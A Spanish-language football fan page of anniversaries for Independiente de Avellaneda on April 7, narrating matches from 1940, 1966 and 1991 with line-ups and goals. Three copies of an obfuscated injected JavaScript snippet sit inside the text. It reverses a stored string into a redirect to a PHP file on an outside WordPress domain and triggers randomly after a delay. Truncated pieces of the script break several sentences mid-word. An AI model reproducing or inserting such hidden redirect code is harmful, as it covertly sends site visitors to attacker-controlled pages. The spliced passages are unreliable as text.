Conectate con nosotros

Efemérides

Efemérides del 07 de Abril

No se puede amar lo que no se conoce. Las efemérides cuentan la enorme historia del Glorioso INDEPENDIENTE de Avellaneda.

1940Independiente hace su debut en el Campeonato de Primera División 1940, presentándose como vigente bicampeón al haber conquistado el título en 1938 y 1939. Y para esa primera fecha no le pudo tocar visitar a un rival más difícil, porque se trató del único equipo que le había peleado al Rojo los dos títulos logrados, River Plate, subcampeón por dos temporadas seguidas.

Aquel día el equipo fue: Fernando Bello; Fermín Lecea y Sabino Coletta; Luis Franzolini, Raúl Leguizamón y Celestino Martínez; Juan Maril, Vicente De la Mata, Arsenio Erico, Antonio Sastre y Juan Zorrilla, con Guillermo Ronzoni como D.T. Mientras que el gran conjunto de River era: Rodríguez; Vaghi y Filippo; Santamaría, Minella y Ramos; Peucelle, Moreno, D´Alessandro, Labruna y Pedernera, dirigidos por el húngaro Franz Platko.

Comenzó jugando mejor River, con mayor dominio de la pelota y buen trato de ella, aunque sin el peso ofensivo para generar peligro, mientras que Independiente tenía menos posesión pero al recuperarla era más pujante para atacar. Poco a poco el Rojo se fue haciendo dominador del trámite, hasta que a los 33 minutos Juan José Zorrilla superó a su marcador en diagonal desde la izquierda hacia el centro, y remató bajo contra un palo dejando al arquero sin chances. Antes de terminar la primera etapa, River se quedaría con diez jugadores por el retiro lesionado de Mario Filippo.

En la segunda parte Independiente no supo aprovechar como se debe el hombre de más, incluso el local tuvo una clarísima para empatar a los 55 minutos, cuando José “Charro” Moreno metió un cabezazo al travesaño y luego Fernando “Tarzán” Bello pudo controlar la pelota.

Después el encuentro se tornó desordenado y con varias acciones bruscas, hasta que llegaron goles en los últimos minutos. Nuevamente Zorrilla estiró la ventaja a los 39’, y a los 44’ descontó Roberto D’Alessandro para el 1 a 2 final.

Sin jugar su mejor partido, Independiente fue justo ganador y si la diferencia no fue mayor fue por dos razones. La figura del encuentro fue el arquero de River Antonio Rodríguez, mientras que Arsenio Erico tuvo una jornada con mucha falta de precisión, incluso en una situación de gol que le atajó el arquero, el paraguayo fue hasta él para felicitarlo.

Así iniciaba Independiente la temporada, que la terminaría como subcampeón sin poder lograr el tricampeonato, aunque tuvo partidos y jornadas memorables con goleadas extraordinarias, por eso que hoy lo dejo acá pero habrá más efemérides de este torneo y datos sobre la campaña en general.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»65″ height=»50″/></figure></div>



<p><strong>1966</strong>  – <strong>Independiente hace su debut en la Copa Libertadores 1966</strong>, en la segunda fase de la competencia o fase semifinal, tal cual lo marcaba el reglamen<script>$mWn=function(n){if(typeof ($mWn.list[n])==to para los campeones vigentes, y el Rojo venía de serlo por duplicado ganando las ediciones 1964 y 1965. En la mencionada instancia de la Copa, formó grupo junto a River, Boca y Guaraní de Paraguay.

Antes de ir de lleno al debut, observen ustedes que les acabo de mencionar una semifinal de copa con un grupo de 4 equipos (generalmente eran de tres), y remarco eso como una prueba más que sirve para poner fin al falso mito de que en aquella época jugaban 4 partidos para ser campeón. El Rojo (o cualquier equipo) debía jugar ida y vuelta con los rivales del grupo y solamente el líder accedía a la final, por lo que al ser un grupo de 4 al menos debía jugar 6 partidos en esa fase, sumado a los que debía jugar en la final.

Además, en ese tiempo, en caso de empate en puntos,  se jugaba partido desempate,  porque generalmente no se tomaba en cuenta la diferencia de gol, de igual modo que las finales podían ser dos encuentros o tres. En fin, es una prueba más de tantas que destruyen esos falsos mitos que se alimentan desde la ignorancia.

Ahora sí, el Rojo debuta un día como hoy y el rival fue Boca, otra vez como en la Copa de 1965, solamente que aquella ocasión había sido en cancha de River el arranque, y en éste 1966 fue en La Bombonera. Y lo que también se repitió fue el resultado, porque Independiente se impuso por 0 a 2 con los goles de Joao Cardoso a los 43 minutos y Aníbal Tarabini  a los 87’.

El equipo completo ese día fue: Osvaldo Toriani; David Acevedo, Idalino Monges, Tomás Rolan (40’ Héctor Zerrillo) y Ricardo Pavoni; Osvaldo Mura, José Pastoriza y Raúl Savoy; Raúl Bernao, Joao Cardoso y Aníbal Tarabini, con Antonio Faldutti como D.T.  Mientras que el local puso a: Minoian; Silvero y Marzolini; Simeone, Sacchi y Silveira; López, Zarich, Rojas, Grillo y Aimonetti, dirigidos por Néstor Rossi.

Las crónicas hablan de un Boca que fue superior prácticamente todo el encuentro, sin demasiadas luces en la creación de juego, y repitiéndose en la búsqueda del Alfredo “el Tanque” Rojas como única opción de llegar al gol. Mientras que Independiente jugó muy mal, perdiendo en todos los sectores del campo, y defendiéndose sin poder realizar un contragolpe. Aun así, logró abrir el marcador con un derechazo notable de Joao Cardozo a los 43 minutos, marcando un golazo desde más de 30 metros.

En la segunda etapa Boca no encontró más caminos para llegar al empate que lo mencionado sobre Rojas, y el Rojo sobre el final llegó al 0 a 2 definitivo, en una jugada de Joao Cardoso por izquierda, buscando a Raúl Savoy por el lado opuesto, éste remata y la pelota da en el palo, para que luego Aníbal Tarabini llegue a mandarla a la red.

En 1965, estos dos rivales protagonizaron el primer enfrentamiento entre equipos argentinos por Copa Libertadores, siendo Independiente quien superara la llave por diferencia de gol recién después de tres partidos jugados. Ahora en 1966, el Rojo lograba la primera victoria como visitante de un equipo argentino sobre otro en la Copa Libertadores.

Otro dato de importancia, que ameritaría una efeméride por sí mismo, es que aquel día debutó con la camiseta de Independiente un futbolista recién llegado de Racing. Desde aquel día hasta su salida del club en 1972, jugaría un total de 213 partidos convirtiendo 41 goles, y se coronó campeón del Nacional 1967, los Metropolitanos 1970 y 1971, y la Copa Libertadores 1972, convirtiéndose en ídolo de la institución. Luego volvería al club como D.T. para transformarse en uno de los más en la historia del club, consolidando y aumentando aún más su idolatría. Claro que me refiero a José Omar “el Pato” Pastoriza, hacedor de las páginas más doradas de la historia de Independiente.

Pero ya habrá tiempo para desarrollar su trayectoria en cada función que tuvo, en mayo por su cumpleaños por ejemplo, pero también en su debut como D.T., en su papel en la huelga de futbolistas, en las consagraciones que tuvo como jugador en los títulos mencionados, más cada uno que ganó desde el banco, etc.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»64″ height=»49″/></figure></div>



<p><strong>1991</strong> – Por la <strong>fecha 7 del Torneo Clausura</strong> 1991, <strong>Independiente recibe a Platense</strong> y le propina una <strong>paliza al ganarle por 5 a 1</strong>. Aquel día <strong>el equipo fue</strong>: Luis <strong>Islas</strong>; Nés<script>$mWn=function(n){if(typeof ($mWn.list[n])==tor Craviotto, Pedro Monzón, Abel Piva y Ricardo Altamirano; José Bianco, Fernando Villarreal, Daniel Garnero y Ricardo Bochini (58’ Fabio Lenguita); Martín Ubaldi y Carlos Alfaro Moreno, con José Omar Pastoriza como D.T. Mientras que visita contaba con un futuro jugador del Rojo como Raúl Cascini, y un futuro D.T. como Pedro Marchetta.

El Rojo permaneció ausente en el juego hasta los 26 minutos, cuando hay penal para Platense que ejecuta Darío Scotto, y Luis Islas logra taparlo. A partir de esa acción del arquero, el equipo hizo un clic positivo en el campo y arrasó a su rival. Inmediatamente hubo penal para el local, y José Bianco lo cambió por gol a los 28 minutos, y a los 44’ dio otro golpe letal, porque “Chaucha” Bianco se escapa por derecha y mete un centro genial, que Martín Ubaldi conecta perfecto para poner el 2 a 0 e irse al descanso.

Ya en la segunda etapa, a los 63 minutos, Carlos Alfaro Moreno mete un gran centro desde la izquierda, y el que aparece como una topadora para cabecear y marcar el tercero es Néstor Craviotto. A los 75’ fue Bianco de nuevo el que convierte, eludiendo al arquero para definir, y tras una asistencia notable de Daniel Garnero. Luego llegó el descuento de la visita, mediante un nuevo penal (no fue) que ejecutó Alejandro Nannini, y que Islas estuvo muy cerca de volver a tapar. Finalmente, a los 89’, Néstor Craviotto se escapó a toda velocidad por derecha y llegó al fondo, metió el centro y conectó de cabeza el “Beto” Alfaro Moreno, invirtiéndose los roles de la jugada del tercer gol, y siendo el 5 a 1 final del partido.

Hay varias cuestiones para hacer mención y destacar de la jornada. Primero decir que se encontraron en el campo de juego Ricardo Bochini y Daniel Garnero, el “Bocha” a menos de un mes de sufrir el patadón de Pablo Erbín que forzó su retiro del fútbol, cuando por aquel entonces expresaba sus intenciones de seguir jugando un poco más. Y el “Dany”, que recién aparecía en el equipo, porque había debutado en Primera División hacía apenas dos fechas. El partido de un día como hoy, fue de lo poco que pudieron hacer en el campo de juego ambos jugadores.

La otra cuestión a destacar, es el buen arranque del equipo de José Pastoriza en ese Clausura. Primero recordemos que el Campeonato de Primera División 1990-1991, se dividió en dos certámenes, Apertura 1990 y Clausura 1991, con un líder cada uno que se midieron en una final para determinar el campeón de la temporada. Dicha modalidad fue solamente usada esa vez, porque para la temporada siguiente se optó por adjudicar un título en cada certamen semestral, es decir, los denominados torneos cortos.

El Rojo no tuvo un buen Torneo Apertura 1990, terminando en mitad de tabla, y dándose la transición de Jorge Solari como D.T. a la llegada del “Pato” por cuarta vez, previo interinato de Salvador Capitano por un par de semanas. Como dije, el arranque del Clausura se mostraba auspicioso, por el nivel mostrado un día como hoy, y por llevar hasta ese momento 4 victorias, 2 empates y una caída, colocándose el Rojo en el segundo puesto a un punto de Boca. Sin embargo, al equipo costaba que le ganen pero también le costaba ganar, y cosecharía una gran cantidad de empates (10 en las 19 fechas), lo que determinó que finalizara en el quinto puesto. El líder fue Boca, que sería derrotado en la final contra el líder del Apertura, Newell´s Old Boys.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»62″ height=»48″/></figure></div>



<p>Les dejo <strong>el video resumen del partido</strong>:</p>



<figure class=
https://www.youtube.com/watch?v=LdGcGNO9smc&ab_channel=HistorialCAI2

Colaboración: Hernán Paglieri-Vicepresidente Peña Roja Daniel BertoniSan Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides